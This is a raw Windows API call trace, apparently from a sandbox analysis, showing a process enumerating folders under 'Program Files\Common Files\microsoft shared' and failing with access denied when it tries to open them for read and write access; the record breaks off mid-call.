[0087.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0087.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0087.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0087.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0087.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0087.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0087.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ab20 [0087.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0087.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0087.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0087.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0087.540] AreFileApisANSI () returned 1 [0087.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Triedit", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Triedit", lpUsedDefaultChar=0x0) returned 55 [0087.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0087.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0087.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0087.540] AreFileApisANSI () returned 1 [0087.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0087.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75be8 [0087.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x75be8, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Triedit") returned 55 [0087.540] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Triedit" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.540] GetLastError () returned 0x5 [0087.540] GetLastError () returned 0x5 [0087.540] SetLastError (dwErrCode=0x5) [0087.540] GetLastError () returned 0x5 [0087.540] SetLastError (dwErrCode=0x5) [0087.540] GetLastError () returned 0x5 [0087.540] SetLastError (dwErrCode=0x5) [0087.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0087.540] AreFileApisANSI () returned 1 [0087.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0087.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75dc8 [0087.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Triedit") returned 55 [0087.541] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Triedit" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.541] GetLastError () returned 0x5 [0087.541] GetLastError () returned 0x5 [0087.541] SetLastError (dwErrCode=0x5) [0087.541] GetLastError () returned 0x5 [0087.541] SetLastError (dwErrCode=0x5) [0087.541] GetLastError () returned 0x5 [0087.541] SetLastError (dwErrCode=0x5) [0087.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0087.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0087.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0087.541] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.541] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.541] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.541] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0087.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a5c8 [0087.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0087.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0087.541] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xbcd0fab8, ftCreationTime.dwHighDateTime=0x1d327b7, ftLastAccessTime.dwLowDateTime=0xa0b594b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2ce22546, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="VC", cAlternateFileName="")) returned 1 [0087.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0087.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0087.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0087.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0087.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0087.542] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78610 [0087.542] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b57d42, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.542] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b58502, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0087.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0087.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0087.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0087.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0087.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0087.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0087.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0087.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0087.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0087.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0087.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0087.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0087.543] AreFileApisANSI () returned 1 [0087.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US", lpUsedDefaultChar=0x0) returned 61 [0087.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0087.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0087.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0087.543] AreFileApisANSI () returned 1 [0087.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0087.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6dfa8 [0087.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6dfa8, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US") returned 61 [0087.544] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\en-us"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.544] GetLastError () returned 0x5 [0087.544] GetLastError () returned 0x5 [0087.544] SetLastError (dwErrCode=0x5) [0087.544] GetLastError () returned 0x5 [0087.544] SetLastError (dwErrCode=0x5) [0087.544] GetLastError () returned 0x5 [0087.544] SetLastError (dwErrCode=0x5) [0087.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0087.544] AreFileApisANSI () returned 1 [0087.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0087.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6ea48 [0087.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US") returned 61 [0087.544] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\en-us"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.544] GetLastError () returned 0x5 [0087.544] GetLastError () returned 0x5 [0087.544] SetLastError (dwErrCode=0x5) [0087.544] GetLastError () returned 0x5 [0087.544] SetLastError (dwErrCode=0x5) [0087.544] GetLastError () returned 0x5 [0087.544] SetLastError (dwErrCode=0x5) [0087.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0087.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0087.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0087.545] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.545] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.545] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.545] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0087.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f848 [0087.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0087.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0087.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f848 | out: hHeap=0x20000) returned 1 [0087.545] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x78, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x822a0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x78, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="")) returned 0 [0087.545] FindClose (in: hFindFile=0x78610 | out: hFindFile=0x78610) returned 1 [0087.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0087.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0087.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0087.545] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78690 [0087.545] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b58502, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.545] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b58502, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0087.545] FindClose (in: hFindFile=0x78690 | out: hFindFile=0x78690) returned 1 [0087.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0087.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0087.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46588 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0087.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46588 | out: hHeap=0x20000) returned 1 [0087.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0087.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0087.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0087.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0087.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0087.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a9f0 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0087.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0087.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0087.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0087.547] AreFileApisANSI () returned 1 [0087.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VC", lpUsedDefaultChar=0x0) returned 50 [0087.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0087.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0087.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0087.547] AreFileApisANSI () returned 1 [0087.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0087.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x467b8 [0087.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x467b8, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC") returned 50 [0087.547] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC" (normalized: "c:\\program files\\common files\\microsoft shared\\vc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, 